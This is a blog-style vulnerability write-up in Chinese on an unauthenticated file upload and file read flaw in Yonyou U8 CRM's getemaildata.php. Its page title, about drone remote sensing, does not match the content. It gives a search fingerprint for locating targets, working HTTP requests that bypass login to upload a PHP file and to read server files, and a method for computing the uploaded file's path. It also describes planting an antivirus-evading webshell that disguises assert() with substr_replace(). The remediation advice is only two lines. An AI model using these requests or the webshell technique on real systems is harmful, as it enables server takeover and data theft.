0
点赞
收藏
分享

微信扫一扫

近地面无人机植被定量遥感与生理参数反演技术

西风白羽 2023-08-14 阅读 54

0x01 产品简介

      用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

   用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。

0x03 复现环境

鹰图指纹:web.body="用友U8CRM"

35afa0e8e728439f93031bc036fc725a.png

0x04 漏洞复现 

 文件上传PoC

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ

0ee7f3ea7708466780d571ce55fb8451.png

 PS:访问的解析文件格式为upd***.tmp.php,星号部分为返回的文件名的十六进制减去一,例如上图中(不带mht):1022——>31303232(十六进制),31303231(十六进制减一)——>1021

207d3283cbe04a0f90c44964a2250b24.png

3f93ebe2208844f88d7ee947958c913a.png

 验证url

http://your-ip/tmpfile/upd十六进制减一.tmp.php

0f36418522c548e9ba844599eea1fe70.png

 上传免杀马子

0b4c71a617b7461697606617368147e8.png

PS:利用 substr_replace() 函数变形 assert 达到免杀的效果 

尝试连接

6b4ce5fba29947a4b1168fdd7f3ceb9c.png

 文件读取PoC

GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip

aa3e37b0a3d04fed8c3bc1063bf8649a.png

0x05 修复建议

关闭互联网访问权限,文件上传模块做好权限强认证。

 尽快打补丁!

 

 

 

 

举报

相关推荐

无人机之遥感影像处理篇

0 条评论